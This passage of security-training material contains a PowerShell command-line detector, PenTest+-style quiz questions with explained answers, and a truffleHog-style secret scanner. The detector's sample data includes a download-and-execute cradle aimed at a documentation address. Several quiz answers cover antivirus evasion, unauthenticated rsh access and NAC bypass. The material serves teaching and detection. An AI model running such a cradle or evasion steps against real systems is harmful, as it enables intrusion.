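# Constructed process-creation command lines (192.0.2.0/24 is documentation address space).
SAMPLE_CMDLINES = [
    'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://192.0.2.10/a.ps1\')"',
    r'powershell.exe -NoProfile -File C:\scripts\backup.ps1',
    'powershell.exe -ep bypass -e SQBFAFgAIAAuAC4ALgA=',   # placeholder blob, not decoded
]


def tokenize(cmdline: str) -> list[str]:
    """Split on whitespace, keeping double-quoted runs together (quotes dropped)."""
    tokens, cur, in_quote = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote
        elif ch.isspace() and not in_quote:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def canonical(token: str):
    """Map -nop / -w / -NoPro... to the full parameter name, or None if not a parameter."""
    if not token.startswith(("-", "/")) or len(token) < 2:
        return None
    name = token[1:].lower()
    if name in ALIASES:
        return ALIASES[name]
    matches = [p for p in PARAMS if p.lower().startswith(name)]
    return matches[0] if len(matches) == 1 else None   # ambiguous prefixes are rejected


def analyze_powershell(cmdline: str) -> dict:
    params, tokens, i = {}, tokenize(cmdline), 1   # tokens[0] is the executable
    while i < len(tokens):
        param = canonical(tokens[i])
        if param in SWITCHES:
            params[param] = True
        elif param == "Command":                    # everything after -c is the command
            params[param] = " ".join(tokens[i + 1:])
            break
        elif param and i + 1 < len(tokens):
            params[param] = tokens[i + 1]
            i += 1
        i += 1

    indicators = []
    if params.get("NoProfile"):
        indicators.append("no profile loaded")
    if str(params.get("WindowStyle", "")).lower() == "hidden":
        indicators.append("hidden window")
    if "EncodedCommand" in params:
        indicators.append("base64-encoded command")
    if str(params.get("ExecutionPolicy", "")).lower() in ("bypass", "unrestricted"):
        indicators.append("execution policy bypass")
    cmd = str(params.get("Command", "")).lower()
    if any(marker in cmd for marker in CRADLE_MARKERS):
        indicators.append("download cradle")
    # One indicator alone (e.g. -NoProfile on a scheduled backup) is normal admin usage.
    return {"params": params, "indicators": indicators, "suspicious": len(indicators) >= 2}


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(analyze_powershell(line))
```

The canonicalisation step matters more than the keyword list: a rule that only matches the literal "-nop -w hidden" is trivially dodged by writing -NoProfile -WindowStyle Hidden, or -nopr -wi h, all of which PowerShell accepts.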

A security professional is setting up a netcat listener but they want to start up in UDP instead of TCP. What parameter should they use? a) -l b) -L c) -e d) -u

d) -u #The -u parameter starts Netcat in UDP mode. The default is to use TCP. Netcat is a command-line utility used to read from or write to a TCP or UDP network connection.

A PenTester is installing optional tools for Linux in preparation for a PenTest. Where do PenTesters store these tools? a) /vulscan b) https://github.com c) pip3 d) /opt

d) /opt #The PenTester stores these tools in the /opt directory, which is where optional (add-on) software is conventionally installed on Linux. #The PenTester will not store optional tools in a top-level /vulscan directory, but might install one tool in a vulscan folder underneath /opt (for example /opt/vulscan). #The PenTester can obtain scripts from https://github.com; for instance, the vulscan Nmap script can be cloned from https://github.com/scipag/vulscan into /opt/vulscan. #The PenTester will not store optional tools in pip3, because pip3 is the Python package installer PenTesters use to fetch modules and install them where Python can import them.

A systems administrator is looking at migrating to the cloud and hears a bunch of new terminologies they are not familiar with. What makes up a cloud federation? a) Infrastructure b) Platform services c) Software d) A combination of all these

d) A combination of all these #A cloud federation is the combination of infrastructure, platform services and software, possibly from more than one provider, presented to the organization as a single environment. #Infrastructure is one component: with cloud computing, an organization can access and manage data and applications from any host, anywhere in the world. #Platform services are another component; because they are reachable from the internet, an attacker may need nothing more than an internet connection and a dictionary of stolen password hashes to cause a breach. #Software is the third component; a lack of oversight of a cloud provider's security procedures can dramatically increase the risk an organization takes on.

A security tester is conducting an assessment on a new network where NAC is employed. What is the most common way to bypass NAC? a) Using decoys b) Advertise a fake MAC address c) Modify the port number d) Access an authenticated device

d) Access an authenticated device #The most common way to bypass NAC is by accessing an authenticated device and using the device to slip by the NAC appliance. #When conducting a port scan on a host, you can use decoys in order to make it appear as if the packets are coming from either a trusted or random device. #In some cases, it might be effective to make the probe appear to be coming from a specific device. In that case, the team can generate a bogus source hardware (or MAC) address. #Network security devices are tuned to either allow or deny specific packets based on several different parameters. One of those parameters is the source port number.

A security researcher is analyzing various on-path attack techniques to develop detection mechanisms against them. Which of the following is NOT an on-path attack? a) DNS poisoning b) ARP poisoning c) MAC spoofing d) Biometric spoofing

d) Biometric spoofing #Biometric spoofing is not an example of an on-path attack; it targets an authentication factor rather than a network path. An on-path attack is one in which a malicious actor sits in the middle of, or in the path of, a connection; DNS poisoning, ARP poisoning and MAC spoofing are all ways of getting traffic routed through the attacker.

A PenTester is writing a script and is using if statements, else statements, and loops to determine how the code will execute. What is this component of a script known as? a) Variables b) Operators c) Data constructs d) Flow control

d) Flow control #Flow control, or the order in which code instructions execute, is one of the most important components of a script's logic and includes using if statements, else statements, and loops. #A variable is any value that a system stores in memory and a coder gives a name or an identifier. In code, you assign values to these variables. #Operators perform specific functions in order to produce a result. Three of the most common operations are Boolean, Arithmetic, and String. #Data constructs are components that PenTesters will use within a script and can include such constructs as variables, logic, operators, flow control, conditionals, and loops, to name but a few.

A digital forensics expert regularly evaluates both iOS and Android devices and often uses an open-source tool that allows the forensics expert to dump process memory, in-process fuzzing, and change a program's behavior. What tool does the forensics expert use? a) APK Studio b) Drozer c) Objection d) Frida

d) Frida #The forensics expert is using Frida, an open-source dynamic instrumentation toolkit that works across a wide range of operating systems and lets the expert dump process memory, perform in-process fuzzing, and change a program's behaviour by hooking functions at runtime. NOTE: Frida can also be scripted to detect whether a device is jailbroken or rooted and to bypass an app's anti-jailbreak or anti-root checks. #APK Studio is an integrated development environment (IDE) designed for decompiling and editing APK files. #Drozer is open-source software used for testing for vulnerabilities on Android devices; it is an attack framework that allows you to find security flaws in apps and devices. #Objection is a Frida-powered runtime exploration toolkit for iOS and Android; it is scriptable and allows digital forensic experts to perform various security-related tasks against decrypted mobile applications without needing a jailbroken or rooted device.

A security engineer is trying to avoid Antivirus on a company's systems. Which tool could they use to modify the hash of their payloads? a) Wget b) theHarvester c) Dirbuster d) ObfuscatedEmpire

d) ObfuscatedEmpire #To get past signature-based antivirus, a tester obfuscates the payload so that its hash and byte patterns no longer match known signatures; ObfuscatedEmpire is a fork of Empire with Invoke-Obfuscation baked directly into its functionality for this purpose. #Wget is not designed to obfuscate malware, but it can be used to grab a banner with wget -S, where -S prints the HTTP headers sent by the server. #theHarvester gathers OSINT such as email addresses and hostnames, and Dirbuster brute-forces directories and files on web servers; neither modifies payloads.

A mobile device user installed a new task management application and allowed the app to have access to all the access permissions requested without checking to see why it wanted them. What kind of attack is this? a) Execution of activities using root b) Drive by downloads c) Spyware d) Over-reach of permissions

d) Over-reach of permissions #This is an over-reach of permissions. Instead of applying the principle of least privilege, a consumer may feel it is necessary to allow an app to access services and data stores that are generally restricted. #Execution of activities using root, which can occur when the user roots or jailbreaks their device to improve its performance, leaves the system vulnerable to attack. #Drive-by downloads can occur while browsing the internet, as a victim can click on a link that downloads malicious software; many times the victim is unaware of this activity. #Spyware records keystrokes and other user activity and sends them to a data collection site.

A penetration tester has connected to a remote system using a tool that will keep the connection encrypted. Which tool is the penetration tester using? a) Telnet b) Netcat c) Ncat d) SSH

d) SSH #The penetration tester is using Secure Shell (SSH), which encrypts remote connections; some configurations require public-key authentication with a key pair (or an SSH certificate) instead of a password. #Telnet is an older remote-access protocol that does not support encryption; most modern systems have Telnet disabled by default. #Netcat is a command-line utility used to read from or write to TCP, UDP, or Unix domain socket connections. It is highly versatile but does not use encryption. #Ncat was developed by the Nmap project as an improvement over Netcat, retaining most of its functionality and adding more, notably support for SSL/TLS.

A secret double agent on a top-secret mission needs to conceal a payload in an audio file using tools built into Kali. What tool could they use to do this? a) SAST b) Bit-Twist c) Meterpreter d) Steghide

d) Steghide #Steghide is an open-source tool used to conceal a payload in either an image or an audio file. The software can compress, conceal, and encrypt data. #Static Application Security Testing (SAST) is done early in the software development life cycle to examine the code for security vulnerabilities. #Bit-Twist is a packet generator and replay tool; the more popular packet-crafting tools are Scapy and hping3, which let users build their own packets. #Meterpreter is a very popular Metasploit payload that gives an interactive command session on the target.

A network contractor is setting up wireless for a small coffee shop and wants to make sure they are secured with a standard that uses 192-bit encryption. Which of the following should they use? a) WEP b) WPA c) WPA2 d) WPA3

d) WPA3 #WPA3 includes advanced features to secure wireless transmissions, such as the 192-bit security mode available in WPA3-Enterprise (used in business LANs). #WEP uses RC4 with short static keys and is broken; it should never be used. #WPA features the Temporal Key Integrity Protocol (TKIP), which dynamically generates a new 128-bit key for each packet. In addition, WPA includes a Message Integrity Check (MIC), which provides a stronger method (than a CRC) to ensure data integrity. #WPA2 is an improvement on WPA and replaced RC4 and TKIP with Counter Mode CBC-MAC Protocol (CCMP) using AES.

A security analyst is trying to find older versions of a company's website which contained sensitive information. They are worried that attackers might still be able to find older versions, so they want to try using web search commands. Which web search command would help them search? a) inanchor b) inurl c) site d) cache

d) cache #A cache search on a site shows the search engine's most recently stored copy of the page. To do a quick check, simply type cache: in the address bar, for example cache:https://comptia.org. Note that Google retired the cache: operator in 2024; to view older versions of a site today, use the Wayback Machine (https://web.archive.org) instead. #inanchor searches anchor text. For example, inanchor:Certification report finds pages whose anchor text includes "Certification" and that have the text "report" anywhere on the page. #inurl:Certification report finds pages whose URLs include "Certification" and that have the text "report" anywhere on the page. #site:comptia.org report searches CompTIA's website only for results including the text "report".

A penetration tester has discovered that a remote access tool can open a shell on a Linux system without even authenticating. What command is the penetration tester using? a) Telnet b) RDP c) SSH d) rsh

d) rsh #The penetration tester is using rsh (remote shell), a Linux command that opens a shell on the remote host; if the server's .rhosts (or /etc/hosts.equiv) file trusts the tester's host and user, no credentials are required at all. Like Telnet, rsh is cleartext and should not be present on any modern system. #Telnet requires a login, and SSH requires a password, key or certificate. #Remote Desktop Protocol (RDP) is Microsoft's protocol for remote GUI connections to a Windows machine and requires authentication.

A penetration tester is looking for secrets in Git repositories that will allow the tester to modify code. What tool is the penetration tester using? a) Brakeman b) SearchSploit c) BeEF d) truffleHog

d) truffleHog #The penetration tester is using truffleHog, which automatically crawls through a repository's history looking for accidentally committed secrets (API keys, tokens, private keys) that would allow an attacker to modify code in the Git repository. #Brakeman is a static code analysis security tool for Ruby on Rails applications which checks for vulnerabilities and provides a confidence level for each finding (high, medium, weak). #SearchSploit is an exploit finder that allows users to search through the information found in Exploit-DB; it also accepts Nmap XML output to search for matching exploits automatically. #BeEF (Browser Exploitation Framework) focuses on web browser attacks, assessing the actual security posture of a target by using client-side attack vectors.
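Added example (not from the original study set): a minimal scanner in the style truffleHog popularised, combining known-format patterns with Shannon-entropy detection of base64 and hex strings on the added lines of a diff. The diff is constructed; the AWS values are the placeholder keys from AWS documentation, and the 32-character hex string shows why hashes and build IDs are routine false positives that need triage.

```python
import math
import re

BASE64_CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
HEX_CHARS = "0123456789abcdefABCDEF"
MIN_RUN = 20                 # shorter strings are too easy to hit by chance
BASE64_THRESHOLD = 4.5       # bits per symbol; thresholds follow the original truffleHog
HEX_THRESHOLD = 3.0

# Known-format rules; the AKIA prefix of AWS access key IDs is public documentation.
PATTERNS = {
    "AWS access key ID": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private key block": re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
}

# Constructed diff (the AWS values are the placeholder keys from AWS documentation).
SAMPLE_DIFF = """\
diff --git a/config.py b/config.py
--- a/config.py
+++ b/config.py
@@ -1,3 +1,6 @@
 import logging
-AWS_ACCESS_KEY_ID = os.environ["AWS_ACCESS_KEY_ID"]
+AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
+AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
+BUILD_ID = "0123456789abcdef0123456789abcdef"
+logger.info("starting worker pool with %d threads", n)
"""


def shannon_entropy(s: str) -> float:
    """Bits per symbol; random base64 approaches 6, English text sits around 4."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum((n / len(s)) * math.log2(n / len(s)) for n in counts.values())


def _runs(text: str, charset: str, min_len: int = MIN_RUN) -> list[str]:
    """Maximal substrings drawn only from `charset`, at least `min_len` long."""
    runs, cur = [], ""
    for ch in text:
        if ch in charset:
            cur += ch
        else:
            if len(cur) >= min_len:
                runs.append(cur)
            cur = ""
    if len(cur) >= min_len:
        runs.append(cur)
    return runs


def scan_diff(diff_text: str) -> list[dict]:
    """Report secrets on added lines: pattern hits plus high-entropy strings."""
    findings = []
    for lineno, line in enumerate(diff_text.splitlines(), 1):
        if not line.startswith("+") or line.startswith("+++"):
            continue                      # only newly added content, not file headers
        content = line[1:]
        for rule, pattern in PATTERNS.items():
            for m in pattern.finditer(content):
                findings.append({"line": lineno, "rule": rule, "match": m.group(0)})
        for word in re.split(r"""[\s"'=:,;()]+""", content):
            for run in _runs(word, BASE64_CHARS):
                if shannon_entropy(run) > BASE64_THRESHOLD:
                    findings.append({"line": lineno, "rule": "high-entropy base64 string", "match": run})
            for run in _runs(word, HEX_CHARS):
                if shannon_entropy(run) > HEX_THRESHOLD:
                    findings.append({"line": lineno, "rule": "high-entropy hex string", "match": run})
    return findings


if __name__ == "__main__":
    for f in scan_diff(SAMPLE_DIFF):
        print(f"line {f['line']}: {f['rule']}: {f['match']}")
```

The access key ID is caught only by its format (its entropy is below the base64 threshold), the secret key only by entropy, and the build ID by the hex rule although it is not a secret; real scanners run this over every commit in the history, since a secret removed in a later commit is still retrievable from Git.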

